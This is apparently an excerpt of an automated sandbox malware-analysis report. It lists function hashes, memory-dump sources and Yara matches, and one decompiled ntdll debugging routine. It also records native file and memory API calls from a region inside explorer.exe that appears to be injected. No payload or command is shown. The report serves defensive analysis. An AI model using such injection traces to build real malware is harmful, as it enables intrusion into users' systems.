                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                    • Instruction ID: b5498e74984cec40a2c6a38f7ece94c688bc02762c3818d5905e012efedaac04
                                                                    • Opcode Fuzzy Hash: c30558eb63c2e97d6c6831b1b92ae4fbf788bb3ad7f0b5fe7e59329d0a732ddf
                                                                    • Instruction Fuzzy Hash: AFB092B29024D5CAEB51E7B04A08B2B7E04BBE6741F26C072E2020785B8778D491F6B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 0040C3C1, Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdbfeed738855f770ffe99ef0d12bc74a414395a9a0250addc1a36fa72e1c033
                                                                    • Instruction ID: 2c2bc72cbfd0baf47f9f15a90931d4a1200a4a556837d90bc02ecab653010e3e
                                                                    • Opcode Fuzzy Hash: bdbfeed738855f770ffe99ef0d12bc74a414395a9a0250addc1a36fa72e1c033
                                                                    • Instruction Fuzzy Hash: A6E0C22AE864814BCB041FBA60665F9FBA1E7670A1B257692CDC453705D106941A87CD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA98A0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                    • Instruction ID: 80e7c74b88f51f5b80398f446ee9277c9114b3a0ad81874ba7596e57ede1daa3
                                                                    • Opcode Fuzzy Hash: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                                    • Instruction Fuzzy Hash: 3690026130100403D24261694414646040DD7D2385F91C032E1414555ED6659953F172
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9820, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                    • Instruction ID: f719995656ee623fe352466aea71d6d429b4a295b24b0a4bbf22f93bc17f59a5
                                                                    • Opcode Fuzzy Hash: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                                    • Instruction Fuzzy Hash: B690027124100403D28171694404646040DE7D1381F91C032A0414554FD6959A56FAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AAB040, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                    • Instruction ID: ea4102b01792301a5e92dc3d108d4c7b813b652b012769d5aa7e9908f8e3d3c0
                                                                    • Opcode Fuzzy Hash: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                                    • Instruction Fuzzy Hash: E69002A1601140434680B16948044465419E7E2341791C131A0444560DD6A89855E2A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA99D0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                    • Instruction ID: d642fb31bcf3141b8e6508ba1b20ec6347d49ddaa7ff503e7b7ee80854962304
                                                                    • Opcode Fuzzy Hash: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                                    • Instruction Fuzzy Hash: 249002A121100043D244616944047460449D7E2341F51C032A2144554DD5699C61A165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9950, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                    • Instruction ID: e9433365228d043fac525cc9de086db07c8b76303feca9347528c0b528c59f52
                                                                    • Opcode Fuzzy Hash: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                                    • Instruction Fuzzy Hash: 939002A120140403D280656948046470409D7D1342F51C031A2054555FDA699C51B175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9A80, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                    • Instruction ID: 936949fc0e195b3af87fcc8b50261bb1b15fd386ce1bef0e7766b1d19d1683af
                                                                    • Opcode Fuzzy Hash: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                                    • Instruction Fuzzy Hash: A990026120144443D28062694804B4F4509D7E2342F91C039A4146554DD9559855A761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9A10, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                    • Instruction ID: 7fed28f27017d91fe909a0e699115d7c32b0c8d7970a2ed767ae396e20846922
                                                                    • Opcode Fuzzy Hash: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                                    • Instruction Fuzzy Hash: 5390027120140403D240616948087870409D7D1342F51C031A5154555FD6A5D891B571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AAA3B0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                    • Instruction ID: b5d0f9ce3fb4aada2f14b424a84e755e03a42f629bab66f3d7a7c4552aa4476f
                                                                    • Opcode Fuzzy Hash: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                                    • Instruction Fuzzy Hash: 6190027120144003D2807169844464B5409E7E1341F51C431E0415554DD6559856E261
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9B00, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                    • Instruction ID: 776c23441be3428e992387b3eba48c1286d5062ad414485a7b5721b9e89eb18f
                                                                    • Opcode Fuzzy Hash: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                                    • Instruction Fuzzy Hash: 2490026124100803D28071698414747040AD7D1741F51C031A0014554ED6569965B6F1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA95F0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                    • Instruction ID: 9d74921b52bca0e5f4827e61ae14116197f4e33ba98693b6aaf6dfc56a16dac2
                                                                    • Opcode Fuzzy Hash: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                                    • Instruction Fuzzy Hash: 3390027120100803D244616948046C60409D7D1341F51C031A6014655FE6A59891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9520, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                    • Instruction ID: 7d9662ad6e8a3fed1e88dd751ce4400a17061ec5250e468d676ad3c083087444
                                                                    • Opcode Fuzzy Hash: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                                    • Instruction Fuzzy Hash: 889002E1201140934640A2698404B4A4909D7E1341F51C036E1044560DD5659851E175
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AAAD30, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                    • Instruction ID: 34e9d23b28d07dda06aa8d4f62a22997667d2d4d74561f2e18c7cb25afe26bca
                                                                    • Opcode Fuzzy Hash: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                                    • Instruction Fuzzy Hash: CE900271A0500013928071694814686440AE7E1781F55C031A0504554DD9949A55A3E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9560, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                    • Instruction ID: 3e5ee99703103bf0c494ce5b740914bb704dc17833dd4cc4dfcae72819f0a1b8
                                                                    • Opcode Fuzzy Hash: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                                    • Instruction Fuzzy Hash: BD900265221000030285A569060454B0849E7D7391791C035F1406590DD6619865A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA96D0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                    • Instruction ID: 53d2bf8f1b0d460efcd76ed25c909f7e08799cc461d3d10a605fa2e80575f851
                                                                    • Opcode Fuzzy Hash: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                                    • Instruction Fuzzy Hash: 4490027120100843D24061694404B860409D7E1341F51C036A0114654ED655D851B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9610, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                    • Instruction ID: a9ede3f7c53e25d79cfd4b8e9e7ab47ef1a10a3254a9be50b3da8e2cb2080f6c
                                                                    • Opcode Fuzzy Hash: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                                    • Instruction Fuzzy Hash: 5E90027160500803D290716944147860409D7D1341F51C031A0014654ED7959A55B6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9650, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                    • Instruction ID: c084f8f012757f0d8577e2c57e4afae6fd6f9ea66af732f8ed40cab02e9168f7
                                                                    • Opcode Fuzzy Hash: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                                    • Instruction Fuzzy Hash: 4790027120504843D28071694404A860419D7D1345F51C031A0054694EE6659D55F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9730, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                    • Instruction ID: 02f0165ac3a81477885a747cb44e45e695ecb3afb0d27b0a62c6ce26b9f2ab04
                                                                    • Opcode Fuzzy Hash: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                                    • Instruction Fuzzy Hash: EF90026160500403D280716954187460419D7D1341F51D031A0014554ED6999A55B6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AAA710, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                    • Instruction ID: d28de0b2940ae967444aac691aa3b382a3b9abd4964a1e1fd030553d0fadbc3c
                                                                    • Opcode Fuzzy Hash: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                                    • Instruction Fuzzy Hash: 6C900271301000539640A6A95804A8A4509D7F1341F51D035A4004554DD5949861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9760, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                    • Instruction ID: f0913206a4ae92bd550c2b46d54513cd428747659343a1f707c27b14d2a72613
                                                                    • Opcode Fuzzy Hash: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                                    • Instruction Fuzzy Hash: 6690027120100403D240616955087470409D7D1341F51D431A0414558EE6969851B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9770, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                    • Instruction ID: 89f98db0f3eb6d282948df418d73f6c62b2f969274da9508d1c86c7113ec9258
                                                                    • Opcode Fuzzy Hash: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                    • Instruction Fuzzy Hash: 5990026120504443D24065695408A460409D7D1345F51D031A1054595ED6759851F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AAA770, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                    • Instruction ID: 1407dcf5a6e870b0e1fffdcd91625bba82f79131df090ed1ac233d2e2e9f6331
                                                                    • Opcode Fuzzy Hash: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                    • Instruction Fuzzy Hash: CE90027520504443D64065695804AC70409D7D1345F51D431A041459CED6949861F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AA9670, Relevance: .0, Instructions: 2COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 5af8322f4f95ad0ade0990ce6918233cddeed9e1a90a3dff63dd899b2780db26
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 53%
                                                                    			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                    0x00affdda
                                                                    0x00affde2
                                                                    0x00affde5
                                                                    0x00affdec
                                                                    0x00affdfa
                                                                    0x00affdff
                                                                    0x00affe0a
                                                                    0x00affe0f
                                                                    0x00affe17
                                                                    0x00affe1e
                                                                    0x00affe19
                                                                    0x00affe19
                                                                    0x00affe19
                                                                    0x00affe20
                                                                    0x00affe21
                                                                    0x00affe22
                                                                    0x00affe25
                                                                    0x00affe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.256208501.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                    • Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
                                                                    • Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                    • Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: explorer.exe PID: 1156 Parent PID: 3388 explorer.exeCOMMON

                                                                    Executed Functions

                                                                    Function 004F81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,004F3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004F3B97,007A002E,00000000,00000060,00000000,00000000), ref: 004F820D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 50cdf84d39e7887bf8064418ed6ce2093ffe3aad7b0f2235123312e6b14a56f5
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 98F0B6B2200108ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F82EA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(0=O,?,?,004F3D30,00000000,FFFFFFFF), ref: 004F8315
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: 0=O
                                                                    • API String ID: 3535843008-1470179389
                                                                    • Opcode ID: 97b5dc38b3a1dc3e3164a60d9373309cfc1952dd406d558b23461257470ab88c
                                                                    • Instruction ID: d0b9bf8eef5500ce99806a271978c7857e1baeb81dd4bd3234426e32fe1cb1c1
                                                                    • Opcode Fuzzy Hash: 97b5dc38b3a1dc3e3164a60d9373309cfc1952dd406d558b23461257470ab88c
                                                                    • Instruction Fuzzy Hash: C0F05E76200214ABD714EFD8DC84EAB73A9EF88310F148559FA089B251C631E91087A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F82F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(0=O,?,?,004F3D30,00000000,FFFFFFFF), ref: 004F8315
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: 0=O
                                                                    • API String ID: 3535843008-1470179389
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 12857af58b7a5c3a2395787bc05cbeb2e2ef3fe162a42813a56e5991cea5de25
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: 5BD012752002146BD710EF99CC45EA7775CEF44750F154459BA185B242C930F90086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,004F3A11,?,?,?,?,004F3A11,FFFFFFFF,?,R=O,?,00000000), ref: 004F82B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: a3c0af5ccfce5029dd73b3fe00335758e02e85350c0d4197b3a169feae2c6d3a
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: 66F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004F839A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,004E2D11,00002000,00003000,00000004), ref: 004F83D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: afa6aecb79b2fafbad65925d7d4689d2a3de1cd088253242b13d5b1102fac91e
                                                                    • Instruction ID: ae25f1e03752053934d8c5181ae297adae79bad9fc7b4260632b8543b9a7ca82
                                                                    • Opcode Fuzzy Hash: afa6aecb79b2fafbad65925d7d4689d2a3de1cd088253242b13d5b1102fac91e
                                                                    • Instruction Fuzzy Hash: 5FF08CB6200108AFDB14CF99CC80EEB77A8EF8C350F01824DFA0897241C630E911CBB0
